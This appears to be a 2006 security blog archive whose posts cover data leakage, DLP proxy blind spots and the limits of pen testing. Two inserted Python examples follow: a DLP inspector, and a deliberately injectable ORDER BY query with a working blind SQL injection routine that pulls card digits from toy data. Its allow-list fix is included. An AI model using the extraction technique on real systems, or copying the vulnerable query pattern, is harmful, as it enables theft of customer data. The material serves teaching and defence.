
October 2006 Archives

October 5, 2006

Information security is a major operational risk

When you lay down a law, make sure it is not disobeyed
The Art of War
I've been working in the field of data theft for about 3 years and the simplicity of it all just amazes me. I ask myself when companies are going to "get it".

Take for example the Veterans Administration event in May 2006. Unencrypted data containing the names, Social Security numbers and birth dates of all U.S. veterans discharged since 1975 was stolen during a burglary at the Maryland home of a data analyst who works for the agency.

Lots of IT security consultants will tell you that the No. 1 tool to protect data is awareness, yet VA officials said the analyst wasn't authorized to take it home. So the employee was probably aware but made a mistake anyway. Awareness did not stop the data from walking out the door; a control that still works after the rules are broken, such as encrypting the disk, would have made the stolen copy useless.

I read a quote from Robert Garigue, chief security executive and vice president of information integrity at Bell Canada in Montreal: "What it comes down to is information life-cycle management".

That's a very nice statement, but I sure as heck don't understand what that means and I doubt my customers do either. All MY customers are still busy with firewall, anti-virus and anti-spyware - a situation echoed by a colleague of ours over at Nextel, the number 2 security integrator in Spain.

Managing information is an operational risk, but are firewalls, anti-virus and anti-spyware relevant to operational risk?

Security technology is seen as a means of defending the organization rather than as a means of understanding and reducing operational risk.

Today's defense-in-depth strategy is to deploy multiple tools at the network perimeter (firewalls, intrusion prevention and malicious content filtering) and at the endpoints (removable device control and personal firewalls). The defensive focus is on outside-in attacks, despite the fact that the majority of attacks on customer data and intellectual property are inside-out.

For sure, information life-cycle management products can help control access and regulate flows of sensitive data in order to prevent unauthorized disclosure. However, the process of classifying and monitoring enterprise information is highly complex and expensive, and as a result has not seen wide customer adoption.

If you're a CIO or CISO, I recommend the following practical strategy:
(which will be a lot cheaper than paying a vendor $5-10M for an enterprise information life-cycle management system)

1. Understand that information security is a major operational risk for your company. You'll find that the CEO appreciates that approach a lot more than your usual spiel about IT security defense-in-depth.

2. Get some software to encrypt data on notebook hard disks; there are plenty of free encryption tools.

3. Give managers corporate USB drives, get the kind that come with encryption. Tell them that use of personal USB drives will be paid for in their performance review.

4. Write an AUP regarding data encryption on notebooks and USB drives. Make everyone sign it, and make violations and compliance part of the employee's performance review. (A free Internet AUP is available for download.)

5. Realize that 50% of all security breaches are due to exploitable vulnerabilities in enterprise software, Web applications in particular; the bugs are simple, fundamental defects. Call us and we'll help you reduce your operational risk due to buggy software.

October 16, 2006

The dark side of content-filtering proxy servers

Well - I'm back from my Sukkot vacation and I see that the raw material for the blog is just piling up - so where do we start? Let's start by bashing Web and mail proxies.

The temptation to use an application layer proxy for filtering outgoing content is just too great.

You don't have to worry about sniffing traffic or reconstructing sessions, and you can always build your content monitoring and filtering application on an existing proxy server (like Microsoft ISA Server) or use ICAP to take a stream from someone else's.

I've recently been looking closer at commercial CMF/Internet Leakage Prevention/Extrusion Prevention products like PortAuthority Technologies that use Web and mail proxies. The results are not encouraging and should be a warning light to potential customers to temper the hype from investors and product-manager/marketing types.

Any proxy-based system will have three major shortcomings when compared with a Layer 2 content interception system:

1. If you use forward proxies for mail and HTTP, then by design your product cannot monitor non-proxied traffic, which is characteristically 20-30% of all outgoing network traffic. The customer doesn't know what data is actually leaking, since a proxy has no visibility into it. Based on live operations at some of my customers, a typical implementation starts with a list of 10-20 IP addresses that are authorized to bypass the mail and Web proxy servers; however, within 48 hours of operation the list grows by a factor of 10x or more.

2. These products inspect only the body of outgoing POST requests. In other words, if a user extrudes sensitive data using an HTTP GET (by placing the sensitive data in the query string), the product never identifies the event and cannot mitigate the threat, even though the proxy relayed the request. Think about a page that uses AJAX: the browser GETs the page, the script then makes XMLHttpRequest calls back to its server with the data in the URL, and that server forwards your data anywhere it likes, making the fancy 6-figure Internet Leakage Prevention appliance totally worthless since it processes POSTs, not GETs.

3. Transparent proxies like PortAuthority or Blue Coat require that all traffic comes from authenticated Microsoft Windows network users. This means that they cannot monitor Linux/Unix/AS400 networks and cannot monitor rogue agents on the network such as custom spyware.

I suppose - you might say - they don't "GET" it....
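Point 2 above is easy to demonstrate. The following script is an added example, not code from the original post or from any of the products named; it parses three constructed HTTP requests (sample data, not captured traffic) that each carry the same Social Security number, once in a POST form body, once percent-encoded in a GET query string and once in a Cookie header. The `inspect()` function can run either as a POST-body-only inspector, the way the post describes these products, or over every channel in the request after URL-decoding. The hostname `files.example.net`, the paths and the SSN are all made up for the example, and the SSN regex is a common pattern, not any vendor's signature.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Common SSN pattern: rejects the 000/666/9xx area, 00 group and 0000 serial.
SSN_RE = re.compile(r"\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")

# Constructed sample requests (not captured traffic). All three carry the same SSN;
# only the first puts it where a POST-body-only inspector looks.
FORM_BODY = "name=J.+Doe&ssn=123-45-6789&dob=1970-01-01"
SAMPLES = {
    "post_form": (
        "POST /upload HTTP/1.1\r\nHost: files.example.net\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(FORM_BODY)}\r\n\r\n{FORM_BODY}"
    ).encode(),
    # Same SSN, percent-encoded dashes, in the query string of a GET.
    "get_query": (
        "GET /search?q=status&ssn=123%2D45%2D6789 HTTP/1.1\r\n"
        "Host: files.example.net\r\n\r\n"
    ).encode(),
    # Same SSN riding in a cookie on a request for a harmless-looking image.
    "get_cookie": (
        "GET /img/pixel.gif HTTP/1.1\r\nHost: files.example.net\r\n"
        "Cookie: sid=8f3a; note=123-45-6789\r\n\r\n"
    ).encode(),
}


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: start line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body.decode("latin-1")}


def decode_form(encoded: str) -> str:
    """URL-decode a query string or form body so 123%2D45%2D6789 reads 123-45-6789."""
    return " ".join(f"{k}={v}" for k, v in parse_qsl(encoded, keep_blank_values=True))


def decoded_channels(req: dict) -> dict:
    """Every place client-supplied data rides in a request, keyed by channel name."""
    chans = {}
    if req["query"]:
        chans["query"] = decode_form(req["query"])
    if req["body"]:
        ctype = req["headers"].get("content-type", "")
        is_form = ctype.startswith("application/x-www-form-urlencoded")
        chans["body"] = decode_form(req["body"]) if is_form else req["body"]
    for name, value in req["headers"].items():
        if name not in ("host", "content-type", "content-length"):
            chans[f"header:{name}"] = value
    return chans


def inspect(raw: bytes, post_body_only: bool = False) -> dict:
    """Return {channel: [SSNs found]}. post_body_only mimics a product that reads
    nothing but the body of a POST; the default looks at every decoded channel."""
    req = parse_request(raw)
    chans = decoded_channels(req)
    if post_body_only:
        chans = {"body": chans["body"]} if req["method"] == "POST" and "body" in chans else {}
    return {name: SSN_RE.findall(text) for name, text in chans.items()
            if SSN_RE.findall(text)}


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:10s} POST-only: {inspect(raw, post_body_only=True)!s:28s}"
              f" all channels: {inspect(raw)}")
```

The POST-only pass flags the form upload and nothing else; the full pass flags all three. Decoding before matching is what makes the query-string case detectable at all, and the cookie case shows that "only POSTs" is not the only blind spot: anything that only reads bodies misses headers too.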

October 17, 2006

Application security is not software security.

I was talking to a prospective customer recently about what I do, i.e. help companies reduce their operational risk by removing fundamental security defects from software. He said to me, "Oh, you mean that's like application security, right?". My initial response was that we tend to work more with software development as opposed to vendor-supplied compiled applications, and we sort of left it at that.

My answer bothered me in the back of my mind for about three weeks until I realized why.

Most IT security staffers and CISOs are people who came into the job with an IT operations or network infrastructure background. They generally have a very basic knowledge of software development, and few were professional software developers in a language like C, Cobol, C# or Java in a previous lifetime. They are charged with protecting the network and servers, and by and large all of their work is reactive.

The entire IT security industry, led by companies such as Check Point, Symantec and McAfee, delivers reactive products built on this operations perspective. The common denominator of every IT security product (firewalls, IDS, IPS and application security firewalls) is that it is reactive, which is why companies continue to spend money on information security and security breaches continue to rise.

NONE of these products address the root cause of the problem, which is buggy, insecure software.

Ask a software developer if a product that does black-box testing based on a checklist of exploits can really determine all the security holes. She will laugh at you. An application security testing tool or application firewall cannot properly mitigate the threat of malicious hackers who have taken the time to learn the vagaries of the source code.

Ask yourself if your firewall, which allows outgoing HTTP on port 80, can prevent data theft. The firewall is based on a notion of protecting trusted systems and users inside a hard perimeter. However, the notion of trusted systems inside a hard perimeter has practically vanished with the proliferation of Web services, SSL VPN and the convergence of application transport onto HTTP.

True, there are new (rather expensive) content monitoring/data leakage prevention/Internet leakage prevention/extrusion prevention technologies. But should your organization spend 6 figures on an extrusion prevention solution while ignoring software vulnerabilities, knowing that 50-80% of all data security breaches are due to fundamental software security defects?

For once, I agree with Gartner Research:

"Through 2010, software development organizations that integrate security into their software development life cycles will experience an 80 percent decrease in critical vulnerabilities found in their publicly released software or externally facing Web applications (0.8 probability)".

Black-box application security testing is good for setting a minimum requirement for commercial, compiled ISV applications. Black-box testing is quick, it's efficient in terms of human resources, and it's also an important support tool for expert evaluation of the source code for vulnerabilities. It cannot replace getting your hands dirty.
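Here is the kind of simple, fundamental defect the post is talking about, as an added example that is not from the original post or from any customer's code. The order-search function below parameterizes the visible search term, so a black-box scanner that throws `' OR 1=1--` at the customer field finds nothing, but it pastes an optional sort column straight into the SQL. Nothing on the checklist guesses that; a reader of the source sees it in one line. The example then uses that column, through nothing but the sort parameter, to read another customer's card digits via a blind (order-based) oracle, and shows the allow-list fix. The table, customer names and card digits are constructed sample data in an in-memory SQLite database.

```python
import sqlite3

# Constructed sample data (not from the original post).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE orders (id INTEGER, customer TEXT, card_last4 TEXT, total REAL)")
    con.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", [
        (1, "alice", "1111", 19.99),
        (2, "bob",   "2222", 250.00),
        (3, "alice", "3333", 5.00),
    ])
    return con


# The "before": the WHERE clause is parameterized, so a scanner's payloads in the
# customer field do nothing. The ORDER BY column is pasted in verbatim; no scanner
# wordlist will hit it, and any string the caller passes becomes SQL.
def search_orders_vulnerable(con, customer: str, sort: str = "id") -> list:
    sql = f"SELECT id, customer, card_last4, total FROM orders WHERE customer = ? ORDER BY {sort}"
    return con.execute(sql, (customer,)).fetchall()


# The fix: identifiers cannot be bound as parameters, so allow-list them.
ALLOWED_SORT = {"id", "total", "customer"}

def search_orders_fixed(con, customer: str, sort: str = "id") -> list:
    if sort not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {sort!r}")
    sql = f"SELECT id, customer, card_last4, total FROM orders WHERE customer = ? ORDER BY {sort}"
    return con.execute(sql, (customer,)).fetchall()


def leak_last4_blind(con, attacker: str, victim: str) -> str:
    """Recover the victim's card_last4 one digit at a time using only the sort parameter.

    The attacker searches their own orders; the injected CASE sorts by id when the guess
    is right and by total when it is wrong, so the id of the first row answers yes/no.
    Assumes the attacker knows their own rows (id 1 has the larger total here)."""
    known = ""
    for _ in range(4):
        for digit in "0123456789":
            probe = (f"CASE WHEN (SELECT card_last4 FROM orders WHERE customer = '{victim}') "
                     f"LIKE '{known}{digit}%' THEN id ELSE total END")
            rows = search_orders_vulnerable(con, attacker, probe)
            if rows[0][0] == 1:      # sorted by id, so the guess was right
                known += digit
                break
    return known


if __name__ == "__main__":
    con = make_db()
    print("scanner payload on the visible field:", search_orders_vulnerable(con, "' OR 1=1--"))
    print("bob's card_last4, leaked through the sort parameter:", leak_last4_blind(con, "alice", "bob"))
    try:
        search_orders_fixed(con, "alice", "total; DROP TABLE orders")
    except ValueError as exc:
        print("fixed version rejects:", exc)
```

The black-box result on the customer field is an empty list, which is exactly what a checklist report would call "no SQL injection found". The blind extraction needs 40 requests at most and never triggers a database error, so an IDS or application firewall watching for error pages or classic payloads sees nothing unusual either.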


October 18, 2006

You cannot test quality into your system

Every security consultant I run into talks about pen (penetration) testing they do for clients. I have not met a single consulting firm that talks about opening up the production software code and looking for vulnerabilities. The reason is that it is just too damn easy to do a pen test, the customer gets a report, and the consultant gets paid and everybody sleeps well at night.

Let me relate a story. A few years ago, at a previous place of employment (Commerce.net), we provided secure transaction processing services to online merchants. We contracted with one of the top networking consultants to do a pen test - which he did, remotely from his office - and he gave us a report of open ports and services. We asked some questions and, after getting some standard answers (I suppose they are standard), we proceeded to close down the exposed ports and services.

Our friend the consultant never bothered coming around to the office during the pen test. What about social engineering? What about vulnerability in the source code of the scripts we wrote and ran for secure credit card processing?

About 3 months later, our VP operations got a phone call from a white-hat hacker who had the names and job titles and organizational structure of the entire company. They met for lunch and it turned out that our white-hatted friend had exploited a vulnerability in Windows servers that could never be detected in a remotely executed pen test. I won't go into details in the interest of protecting both parties.

There is a lot of talk about awareness and governance and compliance stuff which I don't understand, but what I do know is that you cannot pen-test security into your systems, just the way you cannot test quality into your software.

October 19, 2006

K through 12 - control policy for instant gratification

It appears that K-12 has become an interesting niche for advanced content monitoring and filtering products, although my knee-jerk reaction is that a junior high is the last place I would expect to see a cutting-edge solution for controlling disclosure of sensitive data.

Back when I was in junior high and had a crush on Randi Gottlieb, our version of SMS was sending folded pieces of paper across the room, propelled by a rubber band.

On second thought, perhaps extrusion prevention in schools today is not so surprising after all, considering intensive use of text and instant messaging.

Instant Messaging usage by children under 18 is growing rapidly and has surpassed email usage. I bet that within 10 years email will become a tool for the over-50 crowd, with under-30s communicating primarily using IM and SMS. Instant Messaging provides instant gratification for a lot of things: talking to your girlfriend, text payments for MP3s or walking on the dark side and connecting with a drug dealer outside the school.

Vericept and St. Bernard have tackled the education/library market with school-level hardware appliances. Fidelis has taken a somewhat different tack by providing content monitoring for an entire school district using its gigabit network security extrusion prevention appliance at the network gateway layer.

The Washington DC public school district was Fidelis's first customer and last week Fidelis announced that Orange County Public Schools in Florida (one of the top 15 school systems in the United States) selected Fidelis XPS to protect personally identifiable information (PII) of students and enforce the school district’s Acceptable Use Policies (AUP).

OCPS plans to use the Fidelis XPS system to identify violations and vulnerabilities and escalate them into a discussion about how to change their control policy.

Based on my experience with my commercial clients (like 013 Barak in Israel) - I am sure that OCPS will be kept real busy with large numbers of violations that will definitely influence their control policy for the network.

About October 2006

This page contains all entries posted to Israeli Software in October 2006. They are listed from oldest to newest.


Creative Commons License
This weblog is licensed under a Creative Commons License.